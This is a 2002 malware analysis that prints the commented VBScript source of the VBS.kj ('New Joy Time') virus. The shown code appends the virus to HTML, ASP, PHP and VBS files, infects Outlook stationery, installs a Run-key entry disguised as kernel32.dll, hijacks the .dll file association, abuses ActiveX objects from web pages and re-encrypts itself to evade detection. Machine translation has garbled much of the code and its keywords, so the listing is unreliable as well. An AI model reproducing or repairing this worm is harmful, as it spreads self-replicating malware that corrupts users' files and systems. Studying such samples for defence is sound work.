VBS.kj [New Joy Time] - Source Code Analysis "Virus: Vbs.kj
'Analyze By
Dancefire (dancefire@263.net)
'2002/7/10
'
Dim Inwhere, HtmlText, VBSText, Degreesign, AppleObject, Fso, Wsshell, WinPath, Sube, FinalyDisk
SUB KJ_START ()
' Initialize variables
Kjsetdim ()
'Initializing the environment
Kjcreatemilieu ()
'Infected local or shared with HTML
Kjlikeit ()
'Infection Outlook Mail Templates via VBS
Kjcreatemail ()
'Conduct viral communication
KJPROPAGATE ()
End Sub
'Function: kjappendto (filepath, typeestr)
'Features: Additional viruses to the specified file specified
'Parameters:
'Filepath specifies file path
'TypeStr specified type
Function Kjappendto (FilePath, TypeStr)
ON Error ResMe next
'Open the specified file in read-only mode
Set readTemp = fso.opentextfile (FilePath, 1)
'Read the contents of the file into the TMPSTR variable
TMPSTR = ReadTemp.Readall
'Is there a "kj_start () string in the judgment file, if there is an explanation that has been infected, exit the function;
'If the file length is less than 1, the function is exited.
IF INSTR (TMPSTR, "KJ_Start ()") <> 0 or Len (Tmpstr) <1 THEN
ReadTemp.close
EXIT FUNCTION
END IF
'If the type passed is "htt"
'Load the kJ_Start () function when the file head is called;
'Adding an HTML version of the encrypted virion body at the end of the file.
'If it is "html"
'Load the kJ_Start () function and HTML version of viral body when adding a call to the page;
'If it is "VBS"
'Adding VBS version of viral body at the end of the file
If TypeStr = "htt" then
ReadTemp.close
Set filetemp = fso.opentextfile (FilePath, 2)
FileTemp.write "<" & "Body οnlοad =" "&" VBScript: "&" KJ_Start () "" & "&" & vbcrf & tmpstr & vbcrlf & HtmlText
FileTemp.close
SET FATTRIB = fso.getfile (FilePath)
FATTRIB.ATRIBUTES = 34
Else
ReadTemp.close
SET fileTemp = fso.opentextfile (FilePath, 8)
If TypeStr = "HTML" THEN
FileTemp.Write VBCRLF & "<" & "HTML>" & VBCRLF & "<" & "Body οnlοad =" "" "" "" "" "&" & vbcrlf & htmltextelseif typeStr = "vbs" then
FileTemp.write VBCRLF & VBSText
END IF
FileTemp.close
END IF
END FUNCTION
'Function: kjchangesub (currentstring, lastindexchar)
'Features: Change the subdirectories and drive characters
'Parameters:
'Currentstring current catalog
'LastIndexchar's location in the current path in the current path
Function kjchangesub (currentstring, lastindexchar)
'Judgment is the root directory
If LastIndexchar = 0 THEN
'If it's root directory
'If it is C: /, return to the FinalyDisk disk, and set the SUBE to 0,
'If not C: /, return to decrement the current drive 1, and set the SUBE to 0
IF Left (Currenstring), 1) = KJChangeSub = FinalyDisk & ": /" Sube = 0 Else Kjchangesub = CHR (ASC (LEFT (LEFT (LEFT (LEFT (LCASTRING), 1)) - 1) & ": /" Sube = 0 END IF Else 'If it is not an root directory, return to the previous directory name Kjchangesub = MID (Currentstring, 1, LastIndexcha) END IF END FUNCTION 'Function: kjcreatemail () 'Features: Infective Mail Section Function kjcreatemail () ON Error ResMe next 'If the current execution file is "html", you will exit the function. IF inwhere = "html" then EXIT FUNCTION END IF 'Take the path to the blank page of the system disk ShareFile = Left (WinPath, 3) & "Program Files / Common Files / Microsoft Shared / Stationery / Blank.htm" 'If this file is present, you will add HTML virions to it. 'Otherwise, this file containing a viral body IF (fso.fileexists (shadefile). Call Kjappendto (Sharefile, "HTML") Else SET fileTemp = fso.opentextfile (Sharefile, 2, True) FileTemp.write "<" & "HTML>" & VBCRLF & "<" & "Body οnlοad =" "" VBScript: "&" KJ_Start () "" & "&" & vbcrlf & HtmlTextFileTemp.close END IF 'Take the current user ID and Outlook version DefaultId = WSShell.regread ("HKEY_CURRENT_USER / IDENTIN / Default User ID") OutlookVersion = WSShell.regread ("HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Outlook Express / Mediaver") 'Activation of letter paper function, and infect all letter paper WSShell.Regwrite "HKEY_CURRENT_USER / IDENTIES /" & DEFAULTID & "/ Software / Microsoft / Outlook Express /" & Left (OutlookVersion, 1) & ". 0 / Mail / Compose Usenessry", 1, "Reg_dword" Call Kjmailreg ("HKEY_CURRENT_USER / IDentities /" & DefaultID & "/ Software / Microsoft / Outlook Express /" & Left (OutlookVersion, 1) & ". 0 / Mail / Stationery Name", ShareFile Call Kjmailreg ("HKEY_CURRENT_USER / IDENTIES /" & DEFAULTID & "/ Software / Microsoft / Outlook Express /" & Left (OutlookVersion, 1) & ". 0 / Mail / Wide Stationery", ShareFile WSShell.Regwrite "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Office / 9.0 / Outlook / Options / Mail / EditorPreference", 131072, "REG_DWORD" Call Kjmailreg ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Messaging Subsystem / Profiles / Microsoft Outlook Internet Settings / 0A0D02000000000000000000000046 / 001E0360", "Blank") Call KJMailReg ( "HKEY_CURRENT_USER / Software / Microsoft / Windows NT / CurrentVersion / Windows Messaging Subsystem / Profiles / Microsoft Outlook Internet Settings / 0a0d020000000000c000000000000046 / 001e0360", "blank") WsShell.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / Office / 10.0 / Outlook / Options / Mail / EditorPreference", 131072, "REG_DWORD" Call KJMailReg ( "HKEY_CURRENT_USER / Software / Microsoft / Office / 10.0 / Common / MailSettings / NewStationery", " Blank ") KjummageFolder (Left (WinPath, 3) & "Program Files / Common Files / Microsoft Shared / Stationery") END FUNCTION 'Function: kjcreatemilieu () 'Features: Create a system environment Function kjcreatemilieu () ON Error ResMe next Temppath = "" " 'Judging the operating system is NT / 2000 or 9X IF not (fso.fileexists (WinPath & "Wscript.exe)). Temppath = "system32 /" END IF 'It is confusing for the file name and does not conflict with the system file. 'If it is NT / 2000, the file is started for system / kernel32.dll 'If you are 9X boot files for system / kernel.dll If Temppath = "System32 /" THEN Startupfile = WinPath & "System / kernel32.dll" Else Startupfile = WinPath & "System / kernel.dll" END IF 'Add a RUN value, add the startup file path you just generated WSShell.Regwrite "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / Kernel32", StartupFile 'Copying the previous backup file to the original directory Fso.copyfile WinPath & "Web / Kjwall.gif", WinPath & "Web / Folder.htt" Fso.copyfile WinPath & "System32 / KJWALL.GIF", WinPath & "System32 / Desktop.ini" 'Additional viral body to% WINDIR% / Web / Folder.htt Call Kjappendto (WinPath & "Web / Folder.htt", "HTT") 'Change the MIME header of the DLL 'Change the default icon of the DLL 'Change the way of opening the DLL WSShell.Regwrite "HKEY_CLASS_ROOT / .DLL /", "DLLFILE" WSSHELL.REGWRITE "HKEY_CLASS_ROOT / .DLL / Content Type", "Application / X-MSDownload" WsShell.RegWrite "HKEY_CLASSES_ROOT / dllfile / DefaultIcon /", WsShell.RegRead ( "HKEY_CLASSES_ROOT / vxdfile / DefaultIcon /") WsShell.RegWrite "HKEY_CLASSES_ROOT / dllfile / ScriptEngine /", "VBScript" WSShell.Regwrite "HKEY_CLASS_ROOT / DLLFILE / shell / open / command /", WinPath & Temppath & "Wscript.exe" "% 1" "% *" WSShell.Regwrite "HKEY_CLASS_ROOT / DLLFILE / Shellex / PropertySheetHandlers / Wshprops /", "{60254CA5-953B-11CF-8C96-00AA00B8708C}" WSShell.Regwrite "HKEY_CLASS_ROOT / DLLFILE / SCRIPTHOSTENCODE /", "{85131631-480c-11d2-b1f9-00c04f86c324}" 'Write a virion body in the virus file loaded during startup Set filetemp = fso.opentextfile (Startupfile, 2, true) FileTemp.write VBSText FileTemp.close END FUNCTION 'Function: kjlikeit () 'Features: Treatment for HTML files, if access is local or shared file, you will infect this directory Function kjlikeit () 'If the current execution file is not "html", you will exit the program. IF inwhere <> "html" THEN EXIT FUNCTION END IF 'Get the current path of the document ThisLocation = Document.Location 'If it is a local or online sharing file IF Left (thisLocation, 4) = "file" then ThisLocation = MID (thisLocation, 9) 'If this file extension is not empty, save it in thisLocation If fso.getextensionName (thisLocation) <> "" ThisLocation = Left (thisLocation, Len (thisLocation) - len (fso.getfilename (thisLocation))) END IF 'If the length of thisLocation is greater than 3, you will chase a "/" IF Len (thisLocation)> 3 THEN ThisLocation = thisLocation & "/" END IF 'Infection this directory KjummageFolder (thisLocation) END IF END FUNCTION 'Function: kjmailreg (regstr, filename) 'Features: If the registry specifies the key value does not exist, write to the specified file name to the specified location. 'Parameters: 'Regstr registry specified key value 'Filename Specifies the file name Function Kjmailreg (Regstr, FileName) ON Error ResMe next 'If the registry specified key value does not exist, write to the specified file name to the specified location. Regtempstr = WSShell.Regread (RegSTR) If regtempstr = "" "" WSShell.Regwrite Regstr, FileName END IF END FUNCTION 'Function: kjobosub (currentstring) 'Features: Traverse and return to the directory path 'Parameters: 'Currentstring current catalog Function Kjobosub (Currentstring) Sube = 0 TESTOUT = 0 Do While True Testout = TESTOUT 1 IF Testout> 28 THEN Currentstring = FinalyDisk & ": /" Exit do END IF ON Error ResMe next 'Get all the subdireuses of the current directory and put it in the dictionary SET thisfolder = fso.getfolder (currentstring) SET DICSUB = CreateObject ("scripting.dictionary") SET Folders = thisfolder.subfolders Foldercount = 0 For Each TempFolder in Folders Foldercount = foldercount 1 DICSUB.Add Foldercount, TempFolder.name NEXT 'If there is no sub-directory, call kjchangesub to return to the previous directory or replace the drive letter, and set the SUBE 1 IF DICSUB.COUNT = 0 THEN LastIndexchar = Instrrev (currentstring, "/", len (currentstring) -1) Substring = MID (Currentstring, LastIndexchar 1, Len (Currentstring) -lastIndexchar-1) Currentstring = kjchangesub (currentstring, lastindexchar) Sube = 1 Else 'If there is a subdirectory 'If SUBE is 0, turn currentstring to its first sub-directory IF sube = 0 THEN Currentstring = Currentstring & DICSUB.Item (1) & "/" Exit do Else 'If SUBE is 1, continue in the middle of the life, and return the next subdirectory J = 0 For j = 1 to foldercount If LCASTRING = LCase (DICSUB.Item (j)) THEN IF j Currentstring = Currentstring & DICSUB.Item (J 1) & "/" Exit do END IFEND IF NEXT LastIndexchar = Instrrev (currentstring, "/", len (currentstring) -1) Substring = MID (Currentstring, LastIndexchar 1, Len (Currentstring) -lastIndexchar-1) Currentstring = kjchangesub (currentstring, lastindexchar) END IF END IF Loop Kjobosub = currentstring END FUNCTION 'Function: kjpropagate () 'Features: Viral communication Function kjpropagate () ON Error ResMe next Regpathvalue = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Outlook Express / Degree" DiskdeGree = WSShell.Regread (RegPathValue) 'If there is no Degree this key value, DiskdeGree is a FinalyDisk disk. If diskdegree = "" "" Diskdegree = FinalyDisk & ": /" END IF 'Close DiskdeGree after infection 5 directory FOR i = 1 to 5 Diskdegree = kjobosub (DiskdeGree) KjummageFolder (Diskdegree) NEXT 'Save the infection record in the "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Outlook Express / Degree" key value WSShell.Regwrite RegpathValue, Diskdegree END FUNCTION 'Function: kjummagefolder (pathname) 'Features: Infection Specified Directory 'Parameters: 'PathName Specify Directory Function KjummageFolder (Pathname) ON Error ResMe next 'All files set in the directory Set foldername = fso.getfolder (Pathname) SET thisfiles = foldername.files HTTEXISTS = 0 For Each thisfile in thisfiles FILEEXT = ucase (fso.getextensionName (thisfile.path)) 'Judging the extension 'If HTM, HTML, ASP, PHP, JSP add HTML version of viral body to the file 'If VBS is added to the file, you will add VBS version of viral body. 'If it is htt, the flag is already HTT. If FileExt = "HTM" OR FileExt = "HTML" OR FileExt = "ASP" OR FileExt = "PHP" OR FileExt = "JSP" THEN Call kjappendto (thisfile.path, "html") Elseif FileExt = "VBS" THEN Call kjappendto (thisfile.path, "vbs") elseif fileext = "htt" then Httexists = 1 END IF NEXT 'If the path is the desktop, the logo is already HTT. IF (ucase (pathname) = ucase (WinPath & "Desktop /")) or (ucase (pathname) = ucase (WinPath & "Desktop")) Httexists = 1 END IF 'If there is no HTT 'Additional viral body to the catalog IF httexists = 0 THEN Fso.copyfile WinPath & "System32 / Desktop.ini", Pathname Fso.copyfile WinPath & "Web / Folder.htt", Pathname END IF END FUNCTION 'Function kjsetdim () 'Define FSO, WSSHELL object 'Get the last available disk scroll 'Generate the encrypted string for infection 'WEB / FOLDER.HTT and System32 / Desktop.ini in the backup system Function kjsetdim () ON Error ResMe next Err.clear 'Test the current execution file is HTML or VBS Testit = wscript.scriptfullname IF Err THEN Inwhere = "html" Else Inwhere = "VBS" END IF 'Creating a file access object and shell object IF inwhere = "vbs" then SET FSO = CreateObject ("scripting.filesystemObject") SET WSSHELL = CreateObject ("wscript.shell") Else Set AppleObject = Document.Applets ("kj_guest") AppleObject.setClsid ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppleObject.createInstance () SET WSSHELL = AppleObject.getObject () AppleObject.SetClsid ("{0D43FE01-F093-11CF-8940-00A0C9054228}") AppleObject.createInstance () SET FSO = AppleObject.getObject () END IF Set diskObject = fso.drives 'Judgment disk type ' '0: unknown '1: Removable '2: fixed '3: NetWork '4: CD-ROM '5: Ram Disk 'If you are not a movable disk or a fixed disk, you jump out of the loop. Pust may consider the network disk, CD-ROM, RAM Disk is a relatively releared position. Oh, if C: Is Ramdisk? For Each DiskTemp in DiskObject If DiskTemp.DriveType <> 2 and disktemp.driveType <> 1 THENEXIT for END IF FinalyDisk = Disktemp.driveletter NEXT 'The previous virion has been decrypted and stored in thistext. Now in order to spread, it needs to be encrypted again. ' Encryption Algorithm Dim Otherarr (3) Randomize 'Randomly generate 4 operators For i = 0 TO 3 Otherarr (i) = int ((9 * rND)) NEXT Tempstring = "" For i = 1 to Len (thistext) Tempnum = ASC (MID (thistext, i, 1)) 'Do special treatment for the Enter, Putting (0x0D, 0x0A) IF Tempnum = 13 THEN Tempnum = 28 Elseif Tempnum = 10 THEN TEMPNUM = 29 END IF 'Simple encryption processing, each character minus the corresponding operator, then when decrypt, just follow the corresponding operators in this order. Tempchar = CHR (Tempnum - Otherarr (i mod 4)) IF Tempchar = CHR (34) THEN Tempchar = CHR (18) END IF Tempstring = Tempstring & Tempchan NEXT 'Strings containing decryption algorithm Unlockstr = "Execute (" "Dim Keyarr (3), thistext" "& vbcrf &" Keyarr (0) = "& Otherarr (0) &" & vbcrlf & "Keyarr (1) =" & OtheRR (1) & " "& vbrlf &" "Keyarr (2) =" & Otherarr (2) & "" & vbcrf & "" Keyarr (3) = "& OtheRR (3) &" "" & vbcrf & "for i = 1 to Len (Exestring) "& Vbcrf &" "Tempnum = ASC (MID (ExestRing, I, 1))" "& vbcrf &" "& vbrlf &" "& vbcrf &" "Tempnum = 34" "& VBCRLF &" "Endix" & vbcrlf & "tempchar = CHR (Tempnum Keyarr (I Mod 4)) "" & VBCRLF & "" "& vbrlf &" "" & vbrlf & "" Tempchar = VBCR "" & Vbcrf & "" Elseif Tempchar = CHR (29) THEN "& VBCRLF &" Tempchar = VBLF "& VBCRLF &" "Endiff" "& VBCRLF &" "& Vbrlf &" "& vbcrf &" "" & vbcrf & "EXECUTE (THISTEXT)" Copy the encrypted virus to the variable THistext Thistext = "exasting =" "& tempstring &" "" " 'Script of HTML infection HtmlText = "<" & "Script language = VBScript>" & VBCRLF & "Document.write" & "" & "&" & "" "&" Div Style = 'Position: absolute; left: 0px; Top: 0px; width: 0px; height: 0px; z-index: 28; Visibility: hidden '> "&" <"" "" "" "_ guest height = 0 width = 0 code = com.ms "" & "" Activex.active "" & "" XComponent> "&" <"&" / applet> "&" & "&" / div> "" & vbcrf & "<" / script> "& VBCRLF &" <"& VBCRLF &" & VBScript> "& VBCRLF & THISTEXT & VBCRLF & Unlockstr & VBCRLF &" & "&" / Script> & vbcrlf & "<" & "/ Body> & Vbcrf &" "<" & "/ Html>" to generate scripts for VBS infection VBSText = THISTEXT & VBCRLF & Unlockstr & Vbcrlf & "KJ_Start ()" 'Get a Windows directory 'GetSpecialFolder (N) '0: WindowsFolder '1: SystemFolder '2: TemporateFolder 'If the system directory exists on Web / Folder.htt and System32 / Desktop.ini, use the KJWALL.GIF file name backup them. WinPath = fso.getspecialfolder (0) & "/" IF (Fso.fileexists (WinPath & "Web / Folder.htt")). Fso.copyfile WinPath & "Web / Folder.htt", WinPath & "Web / KJWALL.GIF" END IF IF (Fso.fileexists (WinPath & "System32 / Desktop.ini")). Fso.copyfile WinPath & "System32 / Desktop.ini", WinPath & "System32 / KJWALL.GIF" END IF
